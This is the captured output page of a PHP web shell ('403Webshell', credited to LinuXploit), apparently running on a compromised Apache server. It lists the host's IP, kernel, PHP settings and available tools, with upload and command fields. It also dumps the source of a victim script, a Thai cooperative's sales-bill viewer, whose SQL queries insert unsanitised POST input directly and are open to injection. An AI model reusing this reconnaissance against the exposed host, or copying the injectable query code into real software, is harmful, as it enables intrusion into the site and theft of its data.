403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.80
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/cooperative/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/cooperative/regisin111.php
<?
require_once "config/confiteacher.inc.php";
//require_once "../config/connectdb.php";
$bill=$_POST["txtbill"];
?>
<html>
<head>
<title>-:- ADMIN -:-</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="style.css" rel="stylesheet" type="text/css">

</head>
<script language="javascript">
function chk_all(){
	var x=document.getElementsByTagName("input");
	for(i=0;i<=x.length;i++){
		if(x[i].type=="checkbox"){
			x[i].checked=true;
		}
	}
}
function unchk_all(){
	var x=document.getElementsByTagName("input");
	for(i=0;i<=x.length;i++){
		if(x[i].type=="checkbox"){
			x[i].checked=false;
		}
	}
}


</script>
<body bgcolor="#FFFFFF"  onLoad="javascript:document.getElementById('useradmin').focus();">

 <?=$objResult["teachcode"];?>
              <table width="100%" border="0" align="left" cellpadding="1" cellspacing="1">
                <tr> 
                  <td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
                      <tr class="jobscss"> 
                        <td> <table width="100%" border="0" cellspacing="0" cellpadding="0">
                            <tr> 
                              <td><table width="100%" border="0" cellspacing="1" cellpadding="1">
                                  <tr> 
                                    <td width="20" height="24"> <div align="center"><font size="2">ที่</font></div></td>
                                    <td width="100"> <div align="center"><font size="2">รายการ</font></div></td>
                                    
									
									<td width="20"><div align="center"><font size="2">จำนวน</font></div></td>
									<td width="20"><div align="center"><font size="2">ราคา</font></div></td>
                  
                                  </tr>
                                </table></td>
                            </tr>
                          </table>
                          <?
$page = $_GET['page'];
$num = 1;
$select_type="select * from sell where billnumber='$bill'";
$query_select=mysql_query($select_type);
$num_rows=mysql_num_rows($query_select);
if($num_rows<1){
echo "<br><br><center><font color=#666666 face=tahoma size=2>ไม่พบข้อมูลทีี่ท่านค้นหาค่ะ</font></center>";
}else{
		$select="select * from sell where billnumber='$bill'";
		$q_ry = mysql_query($select);
	 	$num_rows=mysql_num_rows($q_ry);
  		$pagesize=1000;
		$rt=$num_rows%$pagesize;
		if($rt!=0)
			{
				$totalpage=floor($num_rows/$pagesize)+1;
			}
		else
			{
				$totalpage=floor($num_rows/$pagesize);
				$toppic_id=1;
			}
		if(empty($page))
			{
				$page=1;
			}
		mysql_free_result($q_ry);
		$goto=($page-1)*$pagesize;
$sql_select_mem="select * from sell join sell_pro on sell.bacodesell=sell_pro.sell_bacode where billnumber='$bill' limit $goto,$pagesize";
		$fect=mysql_query($sql_select_mem);
		if(!$fect)
		{
		("ติดต่อฐานข้อมูลไม่ได้".mysql_error());
		exit;
		}

	  $bgcount=0;
	while($rows=mysql_fetch_array($fect))
	{
$idmember =$rows['idsell'];
$code1 =$rows['bacodesell'];
$pricsell =$rows['pricsell'];
$unitsell1 =$rows['unitsell'];
$billnumber =$rows['billnumber'];
$namestoc =$rows['sell_proname'];
$userbysell =$rows['userbysell'];


				$crsql="SELECT (Name) FROM `klw` where Username='$userbysell'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$namestudent=$dcrd[0];



				$crsql="SELECT count(sell_username) FROM `sell_member` where sell_username='$userbysell'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$countmember=$dcrd[0];
				 
	?>


	






                          <table width="100%" border="0" cellspacing="0" cellpadding="0"> 

                            <tr> 
                              <td bgcolor="#000000"><table width="100%" border="0" cellspacing="1" cellpadding="1">
                                  <tr bgcolor="#FFFFFF"> 
                                    <td width="20"><? echo "$num"; ?></td>
                                   
                 
									 <td width="100"><? echo "$namestoc"; ?></a></td>
									
									<td width="20"><? echo "$unitsell1"; ?></td>

									
									<td width="20">
									<? echo "$pricsell"; ?>
									</td>
                                    
                                  </tr>
                                </table></td>
                            </tr>

							
                          </table>
                          <?
$num = $num+1;

}
echo "<div align=center><br>
                    <font color=#999999 size=2><span class=cc> ";
	for($i=1;$i<$page;$i++)
	{
	echo"<a href='$PHP_SELF?page=$i'><font size=2 color='#000000' class=textborder>$i</font></a> ";
	}
	echo"<font size=2 color=#000000><b><font size=2 color='#FF00000' class=textborderok>$page</font></b></font> ";
	for($i=$page+1;$i<=$totalpage;$i++)
	{
	echo"<a href='$PHP_SELF?page=$i'><font size=2 color='#000000' class=textborder>$i</font></a> ";
	}
echo "</span></font> </div>";
}
?>
                        </td>
                      </tr>
                      <tr class="jobscss"> 
                        <td height="19">&nbsp;</td>
                      </tr>
                      <tr> 
                        <td><div align="center"></div></td>
                      </tr>
                    </table></td>
                </tr>
<center>เลขที : <? echo "$billnumber"; ?> &nbsp;&nbsp;รหัสลูกค้า &nbsp;<? echo "$userbysell"; ?>&nbsp;<? if($countmember<1)
 {
   echo " ";
 }
 else if($countmember > 0)
 {
   echo "สถานะสมาชิก";
 }
?>&nbsp;<? echo "$namestudent"; ?>&nbsp;</center>
              </table>
</table>

</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit